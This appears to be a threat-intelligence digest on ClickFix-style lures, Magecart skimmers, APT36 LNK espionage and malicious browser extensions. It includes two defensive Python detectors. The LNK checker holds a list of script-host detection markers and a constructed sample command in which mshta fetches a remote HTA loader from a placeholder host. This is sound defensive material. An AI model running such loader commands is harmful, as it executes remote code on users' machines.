Update: The Industrialization of ClickFix Social Engineering Through ErrTraffic
Researchers at Hudson Rock have discovered ErrTraffic, a new ClickFix service that is currently being marketed for approximately $800 on Russian-language cybercrime forums. ErrTraffic lowers the barrier to entry for threat actors by providing a polished, SaaS-like platform that automates lure deployment, victim fingerprinting, and payload delivery across Windows, macOS, Android, and Linux systems. The service relies on psychologically manipulative “fake glitch” overlays that visually corrupt legitimate websites, creating a sense of urgency and prompting users to manually execute malicious commands under the guise of fixing a system error. Campaign telemetry observed by researchers shows conversion rates approaching 60%, highlighting how effectively ErrTraffic exploits the trust gap between browser activity and operating-system-level execution to bypass modern browser protections and endpoint defenses.

From an operational perspective, ErrTraffic functions as both a traffic distribution system and a force multiplier for the broader cybercrime ecosystem. Compromised websites are weaponized through lightweight script injection that preserves normal site functionality for most visitors, allowing campaigns to persist undetected while selectively targeting victims outside excluded CIS regions. The delivered payloads are predominantly commodity infostealers, which harvest credentials not only for financial abuse but also for administrative access to content management systems and hosting panels. These stolen credentials are then reused or sold to propagate ErrTraffic onto additional websites, creating a self-reinforcing infection loop that feeds downstream actors, including initial access brokers, ransomware operators, and advanced intrusion groups.
ErrTraffic illustrates how social engineering has become industrialized, shifting the defensive challenge away from purely technical controls toward disrupting credential abuse cycles and reducing the impact of inevitable user-driven execution events.
Update: Magecart Campaign Expands from Payment Skimming to Identity Compromise
Researchers at Source Defense Research have found that a newly uncovered Magecart operation represents a significant escalation in client-side web attacks, leveraging more than 50 distinct malicious scripts to compromise checkout and account creation flows across global e-commerce platforms. Unlike earlier Magecart campaigns that passively skimmed form data, this operation actively manipulates the user experience through modular, payment-processor-specific payloads targeting providers such as Stripe, Mollie, PagSeguro, OnePay, and PayPal. The malware dynamically detects which payment gateway is in use, suppresses legitimate payment iframes, and injects visually identical phishing forms to capture sensitive information before encryption occurs, allowing the transaction to proceed normally and minimizing user suspicion.

Beyond payment card theft, the campaign demonstrates a strategic shift toward full identity compromise and long-term persistence. The scripts incorporate advanced anti-forensics techniques, including hidden DOM inputs for covert exfiltration, asynchronous “silent skimming,” and the use of Luhn-valid junk data to evade security testing and automated scans. In several cases, stolen credentials were subsequently used to create rogue administrator accounts within e-commerce CMS environments, enabling attackers to maintain access even after initial vulnerabilities were remediated. By harvesting credentials, PII, and account recovery data alongside payment details, this campaign enables downstream account takeover, fraud, and reinfection scenarios, underscoring how Magecart operations are evolving into broader, identity-centric intrusion frameworks rather than isolated card-skimming attacks.
APT36 Employs Weaponized LNK Files for Fileless Espionage Operations Against Indian Targets
CYFIRMA identified a targeted cyber-espionage campaign attributed to APT36 (Transparent Tribe), a Pakistan-aligned threat actor with a long history of operations against Indian government, academic, and strategic organizations. The campaign relies on spear-phishing emails delivering a ZIP archive containing a malicious Windows shortcut (LNK) file masquerading as a legitimate PDF document. Uniquely, the shortcut embeds a full PDF structure to closely match the expected file size and appearance, increasing user trust and interaction. When executed, the LNK abuses the trusted Windows binary mshta[.]exe to retrieve and run attacker-controlled HTA content, initiating a fully fileless infection chain. This approach allows the threat actor to blend malicious execution with legitimate system activity while minimizing on-disk artifacts and user suspicion.

Once triggered, the HTA loader performs layered decryption and in-memory deserialization to reconstruct multiple encrypted payloads, ultimately deploying a fully featured Remote Access Trojan. The malware weakens .NET deserialization safeguards, executes malicious DLLs entirely in memory, and dynamically adapts persistence mechanisms based on detected antivirus products. It establishes encrypted command-and-control communications, and supports remote command execution, file manipulation, credential and document theft, clipboard monitoring, and remote desktop surveillance. These capabilities enable long-term, covert access aligned with intelligence collection rather than short-term disruption. Overall, the campaign reflects a clear evolution in APT36’s tradecraft, combining deception, living-off-the-land techniques, and security-aware execution paths to sustain stealthy espionage operations within high-value Indian environments.
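A triage check for the lure described above, written as an added example for this digest rather than anything published by CYFIRMA: it recognises the fixed ShellLink header, then flags a shortcut that carries an embedded PDF body, references a script host such as mshta, or uses a .pdf.lnk double extension. The sample bytes, the hostname and the scoring thresholds are constructed for illustration.

```python
import struct

# ShellLink header: HeaderSize 0x4C followed by the fixed LinkCLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LNK_HEADER = struct.pack("<I", 0x4C) + bytes.fromhex("0114020000000000C000000000000046")
PDF_MAGIC = b"%PDF-"
# Script hosts a document shortcut has no business referencing.
LOLBIN_MARKERS = (b"mshta", b"powershell", b"wscript", b"cscript", b"cmd.exe")


def triage_lnk(data: bytes, filename: str = "") -> dict:
    """Return findings for a candidate shortcut; non-LNK input is reported as benign."""
    findings = {"is_lnk": data.startswith(LNK_HEADER), "embeds_pdf": False,
                "lolbins": [], "double_extension": False, "verdict": "benign"}
    if not findings["is_lnk"]:
        return findings
    # A real PDF begins with %PDF-; a PDF body *inside* an LNK is padding chosen
    # to match the decoy's size and icon preview.
    findings["embeds_pdf"] = PDF_MAGIC in data[len(LNK_HEADER):]
    lowered = data.lower()  # ASCII case-fold; leaves UTF-16LE NUL bytes intact
    for marker in LOLBIN_MARKERS:
        # LNK string data is usually UTF-16LE, so check both encodings.
        if marker in lowered or marker.decode().encode("utf-16-le") in lowered:
            findings["lolbins"].append(marker.decode())
    name = filename.lower()
    findings["double_extension"] = name.endswith(".lnk") and ".pdf" in name[:-4]
    # Constructed scoring: two or more indicators together are rarely legitimate.
    score = findings["embeds_pdf"] + bool(findings["lolbins"]) + findings["double_extension"]
    findings["verdict"] = "suspicious" if score >= 2 else ("review" if score else "benign")
    return findings


# Constructed sample: LNK header, a UTF-16LE mshta command line, then PDF padding.
SAMPLE_LNK = (
    LNK_HEADER
    + b"\x00" * 60
    + "mshta.exe https://example.invalid/loader.hta".encode("utf-16-le")
    + b"\x00" * 16
    + b"%PDF-1.7\n%" + b"\xaa" * 200
)

if __name__ == "__main__":
    print(triage_lnk(SAMPLE_LNK, "Report.pdf.lnk"))
```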
DarkSpectre: A Large-Scale Browser Extension Operation Enabling Surveillance, Fraud, and Corporate Espionage
A newly discovered and highly organized threat operation dubbed DarkSpectre has been responsible for multiple interconnected malicious browser extension campaigns that have infected more than 8.8 million users across Chrome, Edge, Firefox, and Opera over a seven-year period. Rather than isolated or opportunistic abuse, the activity reflects a coordinated ecosystem spanning three major campaigns: ShadyPanda, GhostPoster, and a newly disclosed operation known as the Zoom Stealer. Investigators were able to link these campaigns through shared “clean” infrastructure domains used to power legitimate extension functionality, which were quietly reused across different malicious clusters. This reuse enabled DarkSpectre to operate hundreds of extensions simultaneously, many of which functioned legitimately for years before selectively activating malicious behavior, allowing the group to scale while evading marketplace review and user suspicion.

The most concerning evolution is the Zoom Stealer campaign, which targets corporate meeting intelligence rather than consumer data. Extensions disguised as benign productivity or media tools request excessive permissions across more than 28 video conferencing platforms and establish persistent WebSocket connections to exfiltrate meeting links, credentials, participant lists, speaker profiles, and company metadata in real time. Combined with DarkSpectre’s other playbooks, including long-term spyware operations and steganographic payload delivery via extension assets, the activity demonstrates exceptional patience, funding, and technical versatility. Infrastructure placement, code artifacts, and monetization strategies strongly suggest a China-based operation operating at a near-nation-state scale.
Collectively, these findings highlight a systemic weakness in browser extension security models; trust is established once at publication but can be exploited years later, enabling large-scale surveillance, affiliate fraud, and corporate espionage through tools users believe are safe.
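A manifest audit for the permission pattern described in the Zoom Stealer section, added here as an example and not taken from the DarkSpectre research: it measures how many meeting platforms an extension's host patterns reach, which content-reading permissions it declares, and whether its stated purpose mentions meetings at all. The meeting-host list, keyword list and sample manifest are constructed assumptions; the manifest keys and permission names are the standard Chrome ones.

```python
import json

# Assumed watch-list of meeting platforms (the report does not enumerate its 28).
MEETING_HOSTS = ("zoom.us", "teams.microsoft.com", "meet.google.com", "webex.com")
# Permissions that let an extension read page content, traffic or sessions on matched hosts.
CONTENT_PERMISSIONS = {"webRequest", "webRequestBlocking", "tabs", "cookies", "scripting"}
PURPOSE_WORDS = ("meeting", "zoom", "teams", "webex", "conference", "call")


def _hosts_covered(pattern: str) -> set:
    """Meeting hosts reached by one match pattern; wildcard-all patterns reach every host."""
    if pattern in ("<all_urls>", "*://*/*", "http://*/*", "https://*/*"):
        return set(MEETING_HOSTS)
    return {h for h in MEETING_HOSTS if h in pattern}


def audit_manifest(manifest: dict) -> dict:
    """Score a parsed manifest.json for meeting-surveillance indicators."""
    patterns = list(manifest.get("host_permissions", []))          # MV3
    for script in manifest.get("content_scripts", []):
        patterns.extend(script.get("matches", []))
    perms = set(manifest.get("permissions", []))
    patterns.extend(p for p in perms if "://" in p or p == "<all_urls>")  # MV2 style
    covered = set()
    for pattern in patterns:
        covered |= _hosts_covered(pattern)
    blurb = (manifest.get("name", "") + " " + manifest.get("description", "")).lower()
    findings = {
        "meeting_hosts_covered": sorted(covered),
        "content_permissions": sorted(perms & CONTENT_PERMISSIONS),
        # Reaching meeting sites while the listing never mentions meetings is the disguise.
        "purpose_mismatch": bool(covered) and not any(w in blurb for w in PURPOSE_WORDS),
    }
    high = len(covered) >= 2 and findings["content_permissions"] and findings["purpose_mismatch"]
    findings["risk"] = "high" if high else ("medium" if covered else "low")
    return findings


# Constructed manifest mimicking a "media tool" that quietly spans four meeting platforms.
SAMPLE_MANIFEST = json.loads("""{
  "manifest_version": 3, "name": "Video Downloader Pro",
  "description": "Save videos from any page in one click.",
  "permissions": ["storage", "tabs", "webRequest"],
  "host_permissions": ["*://*.zoom.us/*", "*://teams.microsoft.com/*",
                       "*://meet.google.com/*", "*://*.webex.com/*"]
}""")

if __name__ == "__main__":
    print(audit_manifest(SAMPLE_MANIFEST))
```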